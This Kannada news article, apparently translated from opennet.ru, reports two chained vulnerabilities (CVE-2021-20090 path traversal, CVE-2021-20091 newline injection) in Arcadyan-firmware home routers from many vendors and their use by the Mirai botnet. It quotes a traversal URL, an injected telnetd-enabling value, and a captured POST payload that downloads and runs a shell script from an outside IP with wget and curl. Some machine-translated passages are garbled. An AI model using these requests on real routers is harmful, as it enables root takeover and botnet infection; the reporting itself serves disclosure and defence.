17 ತಯಾರಕರ ಮೇಲೆ ಪರಿಣಾಮ ಬೀರುವ ಹೋಮ್ ರೂಟರ್‌ಗಳಲ್ಲಿನ ದುರ್ಬಲತೆ

Arcadyan ಕಂಪನಿಯಿಂದ HTTP ಸರ್ವರ್ ಅನುಷ್ಠಾನವನ್ನು ಫರ್ಮ್‌ವೇರ್ ಬಳಸುವ ಹೋಮ್ ರೂಟರ್‌ಗಳ ವಿರುದ್ಧ ನೆಟ್‌ವರ್ಕ್‌ನಲ್ಲಿ ಬೃಹತ್ ದಾಳಿಯನ್ನು ದಾಖಲಿಸಲಾಗಿದೆ. ಸಾಧನಗಳ ಮೇಲೆ ನಿಯಂತ್ರಣವನ್ನು ಪಡೆಯಲು, ರೂಟ್ ಹಕ್ಕುಗಳೊಂದಿಗೆ ಅನಿಯಂತ್ರಿತ ಕೋಡ್‌ನ ರಿಮೋಟ್ ಎಕ್ಸಿಕ್ಯೂಶನ್ ಅನ್ನು ಅನುಮತಿಸುವ ಎರಡು ದುರ್ಬಲತೆಗಳ ಸಂಯೋಜನೆಯನ್ನು ಬಳಸಲಾಗುತ್ತದೆ. ಸಮಸ್ಯೆಯು Arcadyan, ASUS ಮತ್ತು Buffalo ನಿಂದ ಸಾಕಷ್ಟು ವ್ಯಾಪಕ ಶ್ರೇಣಿಯ ADSL ರೂಟರ್‌ಗಳ ಮೇಲೆ ಪರಿಣಾಮ ಬೀರುತ್ತದೆ, ಹಾಗೆಯೇ Beeline ಬ್ರಾಂಡ್‌ಗಳ ಅಡಿಯಲ್ಲಿ ಸರಬರಾಜು ಮಾಡಲಾದ ಸಾಧನಗಳು (ಸಮಸ್ಯೆಯನ್ನು Smart Box Flash ನಲ್ಲಿ ದೃಢೀಕರಿಸಲಾಗಿದೆ), Deutsche Telekom, Orange, O2, Telus, Verizon, Vodafone ಮತ್ತು ಇತರ ಟೆಲಿಕಾಂ ಆಪರೇಟರ್‌ಗಳು. 10 ವರ್ಷಗಳಿಗೂ ಹೆಚ್ಚು ಕಾಲ ಅರ್ಕಾಡಿಯನ್ ಫರ್ಮ್‌ವೇರ್‌ನಲ್ಲಿ ಸಮಸ್ಯೆ ಕಂಡುಬಂದಿದೆ ಮತ್ತು ಈ ಸಮಯದಲ್ಲಿ 20 ವಿಭಿನ್ನ ತಯಾರಕರಿಂದ ಕನಿಷ್ಠ 17 ಸಾಧನ ಮಾದರಿಗಳಿಗೆ ಸ್ಥಳಾಂತರಗೊಳ್ಳಲು ನಿರ್ವಹಿಸುತ್ತಿದೆ ಎಂದು ಗಮನಿಸಲಾಗಿದೆ.

ಮೊದಲ ದುರ್ಬಲತೆ, CVE-2021-20090, ಯಾವುದೇ ವೆಬ್ ಇಂಟರ್ಫೇಸ್ ಸ್ಕ್ರಿಪ್ಟ್ ಅನ್ನು ದೃಢೀಕರಣವಿಲ್ಲದೆ ಪ್ರವೇಶಿಸಲು ಸಾಧ್ಯವಾಗಿಸುತ್ತದೆ. ದುರ್ಬಲತೆಯ ಮೂಲತತ್ವವೆಂದರೆ ವೆಬ್ ಇಂಟರ್ಫೇಸ್‌ನಲ್ಲಿ, ಚಿತ್ರಗಳು, CSS ಫೈಲ್‌ಗಳು ಮತ್ತು ಜಾವಾಸ್ಕ್ರಿಪ್ಟ್ ಸ್ಕ್ರಿಪ್ಟ್‌ಗಳನ್ನು ಕಳುಹಿಸುವ ಕೆಲವು ಡೈರೆಕ್ಟರಿಗಳು ದೃಢೀಕರಣವಿಲ್ಲದೆ ಪ್ರವೇಶಿಸಬಹುದು. ಈ ಸಂದರ್ಭದಲ್ಲಿ, ದೃಢೀಕರಣವಿಲ್ಲದೆ ಪ್ರವೇಶವನ್ನು ಅನುಮತಿಸುವ ಡೈರೆಕ್ಟರಿಗಳನ್ನು ಆರಂಭಿಕ ಮುಖವಾಡವನ್ನು ಬಳಸಿಕೊಂಡು ಪರಿಶೀಲಿಸಲಾಗುತ್ತದೆ. ಮೂಲ ಡೈರೆಕ್ಟರಿಗೆ ಹೋಗಲು ಪಥಗಳಲ್ಲಿ "../" ಅಕ್ಷರಗಳನ್ನು ಸೂಚಿಸುವುದನ್ನು ಫರ್ಮ್‌ವೇರ್ ನಿರ್ಬಂಧಿಸಿದೆ, ಆದರೆ "..% 2f" ಸಂಯೋಜನೆಯನ್ನು ಬಳಸುವುದನ್ನು ಬಿಟ್ಟುಬಿಡಲಾಗಿದೆ. ಹೀಗಾಗಿ, "http://192.168.1.1/images/..%2findex.htm" ನಂತಹ ವಿನಂತಿಗಳನ್ನು ಕಳುಹಿಸುವಾಗ ಸಂರಕ್ಷಿತ ಪುಟಗಳನ್ನು ತೆರೆಯಲು ಸಾಧ್ಯವಿದೆ.

ಎರಡನೇ ದುರ್ಬಲತೆ, CVE-2021-20091, ನಿರ್ದಿಷ್ಟವಾಗಿ ಫಾರ್ಮ್ಯಾಟ್ ಮಾಡಲಾದ ನಿಯತಾಂಕಗಳನ್ನು apply_abstract.cgi ಸ್ಕ್ರಿಪ್ಟ್‌ಗೆ ಕಳುಹಿಸುವ ಮೂಲಕ ಸಾಧನದ ಸಿಸ್ಟಮ್ ಸೆಟ್ಟಿಂಗ್‌ಗಳಿಗೆ ಬದಲಾವಣೆಗಳನ್ನು ಮಾಡಲು ದೃಢೀಕೃತ ಬಳಕೆದಾರರನ್ನು ಅನುಮತಿಸುತ್ತದೆ, ಇದು ನಿಯತಾಂಕಗಳಲ್ಲಿ ಹೊಸ ಸಾಲಿನ ಅಕ್ಷರದ ಉಪಸ್ಥಿತಿಯನ್ನು ಪರಿಶೀಲಿಸುವುದಿಲ್ಲ. . ಉದಾಹರಣೆಗೆ, ಪಿಂಗ್ ಕಾರ್ಯಾಚರಣೆಯನ್ನು ನಿರ್ವಹಿಸುವಾಗ, ದಾಳಿಕೋರರು "192.168.1.2%0AARC_SYS_TelnetdEnable=1" ಮೌಲ್ಯವನ್ನು ಕ್ಷೇತ್ರದಲ್ಲಿ IP ವಿಳಾಸವನ್ನು ಪರಿಶೀಲಿಸಬಹುದು ಮತ್ತು ಸ್ಕ್ರಿಪ್ಟ್, ಸೆಟ್ಟಿಂಗ್‌ಗಳ ಫೈಲ್ ಅನ್ನು ರಚಿಸುವಾಗ /tmp/etc/config/ ಅನ್ನು ನಿರ್ದಿಷ್ಟಪಡಿಸಬಹುದು. .glbcfg, ಅದರೊಳಗೆ "AARC_SYS_TelnetdEnable=1" ಸಾಲನ್ನು ಬರೆಯುತ್ತದೆ ", ಇದು telnetd ಸರ್ವರ್ ಅನ್ನು ಸಕ್ರಿಯಗೊಳಿಸುತ್ತದೆ, ಇದು ರೂಟ್ ಹಕ್ಕುಗಳೊಂದಿಗೆ ಅನಿಯಂತ್ರಿತ ಕಮಾಂಡ್ ಶೆಲ್ ಪ್ರವೇಶವನ್ನು ಒದಗಿಸುತ್ತದೆ. ಅಂತೆಯೇ, AARC_SYS ಪ್ಯಾರಾಮೀಟರ್ ಅನ್ನು ಹೊಂದಿಸುವ ಮೂಲಕ, ನೀವು ಸಿಸ್ಟಂನಲ್ಲಿ ಯಾವುದೇ ಕೋಡ್ ಅನ್ನು ಕಾರ್ಯಗತಗೊಳಿಸಬಹುದು. ಮೊದಲ ದುರ್ಬಲತೆಯು "/images/..%2fapply_abstract.cgi" ಎಂದು ಪ್ರವೇಶಿಸುವ ಮೂಲಕ ದೃಢೀಕರಣವಿಲ್ಲದೆ ಸಮಸ್ಯಾತ್ಮಕ ಸ್ಕ್ರಿಪ್ಟ್ ಅನ್ನು ಚಲಾಯಿಸಲು ಸಾಧ್ಯವಾಗಿಸುತ್ತದೆ.

ದುರ್ಬಲತೆಗಳನ್ನು ಬಳಸಿಕೊಳ್ಳಲು, ಆಕ್ರಮಣಕಾರರು ವೆಬ್ ಇಂಟರ್ಫೇಸ್ ಚಾಲನೆಯಲ್ಲಿರುವ ನೆಟ್ವರ್ಕ್ ಪೋರ್ಟ್ಗೆ ವಿನಂತಿಯನ್ನು ಕಳುಹಿಸಲು ಸಾಧ್ಯವಾಗುತ್ತದೆ. ದಾಳಿಯ ಹರಡುವಿಕೆಯ ಡೈನಾಮಿಕ್ಸ್ ಮೂಲಕ ನಿರ್ಣಯಿಸುವುದು, ಬೆಂಬಲ ಸೇವೆಯಿಂದ ಸಮಸ್ಯೆಗಳ ರೋಗನಿರ್ಣಯವನ್ನು ಸರಳಗೊಳಿಸಲು ಬಾಹ್ಯ ನೆಟ್ವರ್ಕ್ನಿಂದ ಅನೇಕ ನಿರ್ವಾಹಕರು ತಮ್ಮ ಸಾಧನಗಳಲ್ಲಿ ಪ್ರವೇಶವನ್ನು ಬಿಡುತ್ತಾರೆ. ಇಂಟರ್ಫೇಸ್ಗೆ ಪ್ರವೇಶವು ಆಂತರಿಕ ನೆಟ್ವರ್ಕ್ಗೆ ಮಾತ್ರ ಸೀಮಿತವಾಗಿದ್ದರೆ, "DNS ರಿಬೈಂಡಿಂಗ್" ತಂತ್ರವನ್ನು ಬಳಸಿಕೊಂಡು ಬಾಹ್ಯ ನೆಟ್ವರ್ಕ್ನಿಂದ ದಾಳಿಯನ್ನು ನಡೆಸಬಹುದು. ಮಿರಾಯ್ ಬೋಟ್‌ನೆಟ್‌ಗೆ ರೂಟರ್‌ಗಳನ್ನು ಸಂಪರ್ಕಿಸಲು ದುರ್ಬಲತೆಗಳನ್ನು ಈಗಾಗಲೇ ಸಕ್ರಿಯವಾಗಿ ಬಳಸಲಾಗುತ್ತಿದೆ: POST /images/..%2fapply_abstract.cgi HTTP/1.1 ಸಂಪರ್ಕ: ಬಳಕೆದಾರ-ಏಜೆಂಟ್ ಅನ್ನು ಮುಚ್ಚಿ: ಡಾರ್ಕ್ ಆಕ್ಷನ್=start_ping&submit_button=ping.html& action_params=3blinktime5. 212.192.241.7%0A ARC_SYS_TelnetdEnable=1& %0AARC_SYS_=cd+/tmp; wget+http://212.192.241.72/lolol.sh; curl+-O+http://212.192.241.72/lolol.sh; chmod+777+lolol.sh; sh+lolol.sh&ARC_ping_status=0&TMP_Ping_Type=4

ಮೂಲ: opennet.ru

ಕಾಮೆಂಟ್ ಅನ್ನು ಸೇರಿಸಿ